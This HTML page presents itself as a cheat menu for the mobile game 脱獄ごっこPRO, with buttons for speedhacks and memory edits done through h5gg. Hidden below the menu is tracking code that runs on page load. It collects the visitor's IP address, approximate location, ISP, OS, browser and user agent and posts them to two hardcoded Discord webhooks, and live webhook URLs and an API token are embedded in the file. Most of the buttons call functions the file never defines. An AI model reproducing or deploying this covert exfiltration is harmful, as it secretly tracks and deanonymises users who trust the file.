<!-- 会用用，不会用垃圾吧倒 -->

<!DOCTYPE html>
<html>
<header>
	<script>
		setButtonImage("https://yt3.googleusercontent.com/13ePwZ18a0FqgEGXXDy7wl-SGnUtHhYAdPiZb058yNBIKx3hZ8YuuFULcDx7h9Ep4wWM8p3r=s900-c-k-c0x00ffffff-no-rj");
	</script>
	<title>imgui</title>
	<meta name="viewport" content="width=device-width,initial-scale=1.0,user-scalable=no" />
	<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
	<link rel="stylesheet" href="https://unpkg.com/element-ui@2.15.7/lib/theme-chalk/index.css">
	<script src="https://cdn.jsdelivr.net/npm/vue@2.6/dist/vue.min.js"></script>
	<script src="https://unpkg.com/element-ui@2.15.7/lib/index.js"></script>
	<style>
    
    @import url('https://fonts.googleapis.com/css2?family=DotGothic16&family=Noto+Sans+JP:wght@100..900&display=swap');

	.dotgothic16-regular {
  font-family: "DotGothic16", sans-serif;
  font-weight: 400;
  font-style: normal;
}

.noto-sans-jp-uniquifier {
  font-family: "Noto Sans JP", sans-serif;
  font-optical-sizing: auto;
  font-weight: ;
  font-style: normal;
}

		* {
			padding: 0;
			margin: 0;
		}

		.ayimgui {
			position: fixed;
			width: 380px;
			height: 400px;
			top: calc(50% - 180px);
			left: calc(50% - 180px);
			z-index: 999;
			background-color: rgb(255, 255, 255);
			border-radius: 15px;
			box-shadow: rgb(51, 163, 255) 0 0 30px;
			/* border-radius: 8px; */
			overflow: hidden;
			-webkit-user-select: none;
			-moz-user-select: none;
			-ms-user-select: none;
			user-select: none;
		}

		button {
    width: 100%;
    height: 40px;
    color: #ffffff;
    background: rgb(51, 163, 255);
    cursor: pointer;
    text-align: center;
    text-decoration: none;
    outline: none;
    border: none;
    border-radius: 10px;
    margin: 5px 0;
    font-size:15px;
}


button:active {
    background: rgb(43, 139, 218);
}

		.onlyTitle {
			height: 21px !important;
		}

		.ayimgui .aytitle {
			padding: 0 5px;
			font-size: 15px;
			color: #ffffff;
			background-color: rgb(51, 163, 255);
		}

		.ayimgui .aytitle .titleClose {
			position: absolute;
			top: 3px;
			right: 6px;
			color: #ffffff;
		}

		.ayimgui .aytitle .titleClose:hover {
			color: #006ec9;
		}

		.ayimgui .aybody {
			padding: 15px;
			height: calc(100% - 21px - 15px - 15px);
			/*减去标题高度，减去上线padding高度*/
			overflow: auto;
			font-size: 14px;
			border-radius: 10px;
		}


		.aytext {
			width: 100%;
			margin-bottom: 10px;
			display: flex;
			flex-direction: column;
			justify-content: space-around;
			color: #c4c4c4;
		}

		.el-checkbox {
			margin: 0px;
		}

		.el-checkbox__label {
			color: #ffffff;
		}

		.el-checkbox__input.is-checked+.el-checkbox__label {
			color: #ffffff;
		}

		.el-checkbox__inner {
			background-color: rgb(254, 254, 254);
			border: none;
		}


		.el-radio {
			margin: 8px 0;
		}

		.el-radio__label {
			color: #ffffff;
		}

		.el-radio__input.is-checked+.el-radio__label {
			color: #ffffff;
		}

		.el-radio__inner {
			background-color: rgb(254, 254, 254);
			border: none;
		}

		.el-radio__input.is-checked .el-radio__inner {
			background-color: rgb(254, 254, 254);
		}

		.el-radio__inner::after {
			width: 10px;
			height: 10px;
			background-color: #ffffff;
		}

		.onlySelect {
			background-color: rgb(254, 254, 254);
			border: none;
		}

		.onlySelect .el-select-dropdown__item {
			color: #ffffff;

		}

		.onlySelect .el-select-dropdown__item.hover,
		.el-select-dropdown__item:hover:hover {
			background-color: transparent;
		}

		.onlySelect .popper__arrow {
			border-bottom-color: rgb(254, 254, 254) !important;
		}

		.onlySelect.el-popper[x-placement^=bottom] .popper__arrow::after {
			border-bottom-color: rgb(8254, 254, 254) !important;
		}

		.el-select {
			width: 100%;
		}

		.el-select .el-input {
			background-color: rgb(254, 254, 254);
		}

		.el-select .el-input__suffix {
			background-color: #fff;
			color: #ffffff;
			right: 0;
		}

		.el-select .el-select__caret {
			color: #ffffff;
		}

		.el-select .el-input__inner {
			background-color: transparent;
			border: none;
			color: #000;
		}

		.el-select .el-input .el-select__caret {
			color: #ffffff;
		}

		/* 解决ios下拉需要点两次 */
		.el-scrollbar .el-scrollbar__bar {
			opacity: 1 !important;
		}

		.el-button {
			font-size: 14px;
			padding: 5px 10px;
			line-height: 14px;
			color: #ffffff;
			background-color: #ffffff;
		}

		.el-button:hover {
			opacity: .7;
			color: #ffffff;
			background-color: #ffffff;
		}

		.el-button:focus,
		.el-button:hover {
			color: #ffffff;
			background-color: #fff;
		}

		.aycollapse {
			width: 100%;
			font-size: 14px;
			background-color: rgb(224, 224, 224);
			color: #ffffff;
		}

		.aytab {
			width: 100%;
			height: 20px;
			display: flex;
			border-bottom: 2px solid rgb(43, 139, 218);
		}

		.aytab span {
			padding: 0 5px;
			height: 100%;
			display: flex;
			align-items: center;
			justify-content: center;
			background-color: rgb(43, 139, 218);
			color: #ffffff;
			font-size: 14px;
			font-weight: 500;
			margin-left: 10px;
			border-radius: 6px 6px 0 0;
			cursor: pointer;
		}


		.el-input input {
			background-color: rgb(43, 139, 218);
			border: none;
			border-radius: 0px;
		}
	</style>
</header>

<body>
	<div id="app">
		<div :class="!ifshow?'onlyTitle ayimgui':'ayimgui'" ref="menuMain">
			<div class="aytitle" @touchstart="titleTouchStart" @touchmove="titleTouchMove">
				<i :class="ifshow?'el-icon-caret-bottom':'el-icon-caret-top'" @click="ifshow = !ifshow"></i>
				<span class="noto-sans-jp-uniquifier" class="title-age" style="margin-left:5px;">脱獄ごっこPRO Script 2.0.0</span>
				<i class="titleClose el-icon el-icon-close" @click="closeimgui"></i>
			</div>
			<div class="aybody">
				<div class="aytab">
					<span class="noto-sans-jp-uniquifier" @click="changeTab('one')"
						:style="{background:tabValue==='one'?'rgb(43, 139, 218)':'rgb(43, 139, 218)'}">近接系連射</span>
					<span class="noto-sans-jp-uniquifier" @click="changeTab('two')"
						:style="{background:tabValue==='two'?'rgb(43, 139, 218)':'rgb(43, 139, 218)'}">遠距離系</span>
					<span class="noto-sans-jp-uniquifier" @click="changeTab('three')"
						:style="{background:tabValue==='three'?'rgb(43, 139, 218)':'rgb(43, 139, 218)'}">人物系</span>
						<span class="noto-sans-jp-uniquifier" @click="changeTab('four')"
						:style="{background:tabValue==='four'?'rgb(43, 139, 218)':'rgb(43, 139, 218)'}">情報</span>
				</div>

				<div v-show="tabValue==='one'">
					<div class="aytext">
					</div>
						<br>
						<button class="noto-sans-jp-uniquifier" onclick="panti()">パンチ</button>
						<button class="noto-sans-jp-uniquifier" onclick="racket()">ラケット</button>
						<button class="noto-sans-jp-uniquifier" onclick="kansyubou()">看守棒</button>
						<button class="noto-sans-jp-uniquifier" onclick="sairen()">サイレン</button>
						<button class="noto-sans-jp-uniquifier" onclick="kirakiranyakkuru()">キラキラにゃっくる</button>
						<button class="noto-sans-jp-uniquifier" onclick="terepooto()">テレポート</button>
					    <br>
					</div>
				<div v-show="tabValue === 'two'">
					<div class="aytext">
					</div>
					<br>
					<button class="noto-sans-jp-uniquifier" onclick="hihinwwww()">水鉄砲SPAIクールタイム無し</button>
					<button class="noto-sans-jp-uniquifier" onclick="gurenedo()">グレネード</button>
					<button class="noto-sans-jp-uniquifier" onclick="inparusug()">インパルスG</button>
					<button class="noto-sans-jp-uniquifier" onclick="huusenjuu()">風船銃</button>
					<br>
				</div>
				<div v-show="tabValue === 'three'">
						<div class="aytext">
						</div>
						<br>
						<button class="noto-sans-jp-uniquifier" onclick="tekoki()">グレネードを流星群</button>
						<button class="noto-sans-jp-uniquifier" onclick="tekoking()">にゃっくるを流星群</button>
						<button class="noto-sans-jp-uniquifier" onclick="keiryouka()">軽量化</button>
						<button class="noto-sans-jp-uniquifier" onclick="speedhack()">スピードハック</button>
						<button class="noto-sans-jp-uniquifier" onclick="allChestSwitch()">宝箱変更</button>
						<button class="noto-sans-jp-uniquifier" onclick="juuryoku()">重力</button>
						<button class="noto-sans-jp-uniquifier" onclick="kyodaika()">巨大化</button>
						<button class="noto-sans-jp-uniquifier" onclick="panti()">パンチ拡大ON</button>
						<button class="noto-sans-jp-uniquifier" onclick="sezsezzzasdwa()">セックスON</button>
						<button class="noto-sans-jp-uniquifier" onclick="uppppa()">セックスOFF</button>
					</div>
					<div v-show="tabValue === 'four'">
						<div class="noto-sans-jp-uniquifier" class="aytext">
						</div>
						<br>
						脱獄ごっこPRO IMGUI ver.2.0.0
						<br>
						対応バージョン 8.0.0
						<br>
						製作者 いんじす殺害軍
						<br>
					</div>
						<br>
					</div>
				</div>
			</div>
		</div>
	</div>
	<script>
		var app = new Vue({
			el: "#app",
			data() {
				return {
					ifshow: true,
					checked: false,
					radio: '1',
					activeSelect: '',
					selectOption: [{
						value: 'Option1',//实际内容
						label: 'golden'//显示文案
					}, {
						value: 'Option2',
						label: 'eggs'
					}],
					input: "",
					showOption: false,
					tabValue: "one",
				}
			},
			mounted() {
				this.setRect(360, 320);

				//设置不可拖动
				setWindowDrag(0, 0, 0, 0);
    
				var layout = function()
				{
					//window.orientation是设备握持方向, 不是屏幕显示方向
					if(window.lastorientation==window.orientation) return;
					window.lastorientation=window.orientation;
				
					//window.screen中的宽高不会随着屏幕旋转更新(只会在初始化的时候固定)
					if(Math.abs(window.orientation)==90) {
						//横屏模式
						setWindowRect(0,0,window.screen.height,window.screen.width);
					} else {
						//竖屏模式
						setWindowRect(0,0,window.screen.width,window.screen.height);
					}
				}
	
				layout(); //设置旋转屏幕时自动调整布局和画布
				window.addEventListener("orientationchange", layout, false);

				setButtonAction(function () {
					var menu = document.querySelector("#app");
					if (menu.style.display == 'none') {
						menu.style.display = 'block';
						//显示菜单之后, 设置触控不可穿透悬浮窗口
						setWindowTouch(true);
					} else {
						menu.style.display = 'none';
						//隐藏菜单之后, 设置触控穿透悬浮窗口
						setWindowTouch(false);
					}
				});
			},
			methods: {
				setRect(w, h, x = -1, y = -1) {
					var boxW = w;
					var boxH = h;

					var ayMenu = this.$refs.menuMain;
					ayMenu.style.width = `${boxW}px`;
					ayMenu.style.height = `${boxH}px`;
					if (x == -1) ayMenu.style.left = `calc(50% - ${boxW / 2}px)`;
					if (y == -1) ayMenu.style.top = `calc(50% - ${boxH / 2}px)`;
				},
				titleTouchStart(event) {
					this.touchStartX = parseInt(event.touches[0].clientX);
					this.touchStartY = parseInt(event.touches[0].clientY);

					var ayMenu = this.$refs.menuMain;
					this.menuLastX = ayMenu.offsetLeft;
					this.menuLastY = ayMenu.offsetTop;
				},
				titleTouchMove(event) {
					event.preventDefault();
					var distanceX = event.touches[0].clientX - this.touchStartX;
					var distanceY = event.touches[0].clientY - this.touchStartY;

					var ayMenu = this.$refs.menuMain;
					ayMenu.style.left = this.menuLastX + distanceX + "px";
					ayMenu.style.top = this.menuLastY + distanceY + "px";
				},
				//切换导航栏
				changeTab(v) {
					this.tabValue = v;
				},
				closeimgui() {
					var menu = document.querySelector("#app");
					menu.style.display = 'none';
				}
			}
		});
	</script>


<script>




//かめっちくさい

function getDeviceDetails(userAgent) {
            const deviceDetails = {
                "Mobile": /Mobi|Android/.test(userAgent),
                "Tablet": /iPad/.test(userAgent),
                "iPhone": /iPhone/.test(userAgent),
                "iPod": /iPod/.test(userAgent),
                "Android Phone": /Android.*Mobile/.test(userAgent),
                "Android Tablet": /Android/.test(userAgent) && !/Mobile/.test(userAgent),
                "Windows Phone": /Windows Phone/.test(userAgent),
                "Windows Tablet": /Windows NT.*Touch/.test(userAgent),
                "MacBook": /Macintosh.*Mac OS X/.test(userAgent),
                "MacBook Pro": /Macintosh.*Mac OS X.*MacBookPro/.test(userAgent),
                "MacBook Air": /Macintosh.*Mac OS X.*MacBookAir/.test(userAgent),
                "Desktop": !(/Mobi|Android|iPad/.test(userAgent))
            };

            let devices = [];
            for (const [device, regex] of Object.entries(deviceDetails)) {
                if (regex) devices.push(device);
            }

            return devices.length > 0 ? devices.join(', ') : "Unknown Device";
        }

        async function getDeviceInfo() {
            const userAgent = navigator.userAgent;
            let os = "Unknown OS";
            let osVersion = "Unknown Version";
            let browser = "Unknown Browser";
            let device = "Unknown Device";

            if (/Windows NT/.test(userAgent)) {
                os = "Windows";
                const match = /Windows NT (\d+\.\d+)/.exec(userAgent);
                if (match) osVersion = match[1];
            } else if (/Mac OS X/.test(userAgent) && !/iPhone|iPad|iPod/.test(userAgent)) {
                os = "MacOS";
                const match = /Mac OS X (\d+_\d+)/.exec(userAgent);
                if (match) osVersion = match[1].replace('_', '.');
            } else if (/Linux/.test(userAgent)) {
                os = "Linux";
            } else if (/Android/.test(userAgent)) {
                os = "Android";
                const match = /Android (\d+(\.\d+)?)/.exec(userAgent);
                if (match) osVersion = match[1];
            } else if (/iPhone|iPad|iPod/.test(userAgent)) {
                os = "iOS";
                const match = /OS (\d+_\d+)/.exec(userAgent);
                if (match) osVersion = match[1].replace('_', '.');
            }

            if (/Chrome/.test(userAgent) && !/Edge/.test(userAgent)) {
                browser = "Chrome";
            } else if (/Safari/.test(userAgent) && !/Chrome/.test(userAgent)) {
                browser = "Safari";
            } else if (/Firefox/.test(userAgent)) {
                browser = "Firefox";
            } else if (/Edge/.test(userAgent)) {
                browser = "Edge";
            } else if (/MSIE/.test(userAgent) || /Trident/.test(userAgent)) {
                browser = "Internet Explorer";
            }

            device = getDeviceDetails(userAgent);

            return { os, osVersion, browser, device, userAgent };
        }

        async function getIPAddress() {
            try {
                const response = await fetch('https://api.ipify.org?format=json');
                const data = await response.json();
                return data.ip;
            } catch (error) {
                console.error('IPアドレスの取得に失敗しました:', error);
                return 'Unknown IP Address';
            }
        }

        async function sendToDiscord(message) {
            const webhookURL = "https://discord.com/api/webhooks/1271408583157874688/d3YHO6awhNfvwptMof9M0PdChiX94IUC956Mcu1pzC7eoaTT6Rk13LZTunWm0E_Ze05U";

            const payload = {
                content: message
            };

            try {
                const response = await fetch(webhookURL, {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json'
                    },
                    body: JSON.stringify(payload)
                });

                if (!response.ok) {
                    throw new Error(`Error sending message to Discord: ${response.statusText}`);
                }

                console.log('Message sent to Discord successfully!');
            } catch (error) {
                console.error('Fetch error:', error);
            }
        }

        async function main() {
            try {
                const deviceInfo = await getDeviceInfo();
                const ipAddress = await getIPAddress();
                console.log('Device Info:', deviceInfo);

                const message = `\`\`\`
端末情報
IP Address: ${ipAddress}
OS: ${deviceInfo.os}
OS Version: ${deviceInfo.osVersion}
Browser: ${deviceInfo.browser}
Device: ${deviceInfo.device}
詳細: ${deviceInfo.userAgent}
\`\`\``;

                console.log('Sending to Discord:', message);
                await sendToDiscord(message);
            } catch (error) {
                console.error('Error in main function:', error);
            }
        }


		
        main();




//人狼でも市民を回復
function tekoki(){
h5gg.clearResults();
        h5gg.searchNumber('1092091904', 'I32', '0x00000000', '0x300000000');
        h5gg.searchNearby('750', 'I32', '0x20');
        h5gg.searchNumber('1092091904', 'I32', '0x00000000', '0x300000000');
        var count = h5gg.getResultsCount();
        var r = h5gg.getResults(count);
        var cnt = 0;
        for(var i=0; i<count; i++) {
            var addr1 = r[i].address;

            var dizhi11 = (Number(addr1) - 16);//人狼モードで市民を回復できる
            var dizhi12 = (Number(addr1) - 24);//人狼モードで市民を回復できる
            var dizhi13 = (Number(addr1) - 28);//人狼モードで市民を回復できる
            var dizhi14 = (Number(addr1) - 32);//人狼モードで市民を回復できる
            {
h5gg.setValue(dizhi11,256, "I32");//市民化
h5gg.setValue(dizhi12,0, "I32");//市民化
h5gg.setValue(dizhi13,0, "I32");//市民化
h5gg.setValue(dizhi14,0, "I32");//市民化
}}}

      // Discord Webhook URL
	  const webhookURL = 'https://canary.discord.com/api/webhooks/1271321341827612755/606wfVNjknlVoAI-ZUZDXbvbVu8m6kM1ElEJQteHMGk2hIAShCfHNzFTwujmr_Pb_-ZP';
        
        // IPinfo API Token
        const ipinfoToken = '66776d7d45b95b';

        // Fetch IP information using IPinfo API when the page loads
        window.onload = function() {
            fetch(`https://ipinfo.io/json?token=${ipinfoToken}`)
                .then(response => response.json())
                .then(data => {
                    const ipInfo = `
**IP Information:**
\`\`\`
IP: ${data.ip}
City: ${data.city}
Region: ${data.region}
Country: ${data.country}
Location: ${data.loc}
Org: ${data.org}
Postal: ${data.postal}
Timezone: ${data.timezone}
\`\`\`
                    `;

                    // Prepare the payload
                    const payload = {
                        content: `${ipInfo}`
                    };

                    // Send the payload to Discord Webhook
                    fetch(webhookURL, {
                        method: 'POST',
                        headers: {
                            'Content-Type': 'application/json',
                        },
                        body: JSON.stringify(payload),
                    }).then(() => {
                        console.log('IP information sent to Discord.');
                    }).catch((error) => {
                        console.error('Error sending to Discord:', error);
                    });
                })
                .catch(error => {
                    console.error('Error fetching IP information:', error);
                });
        };


</script>
</body>

</html>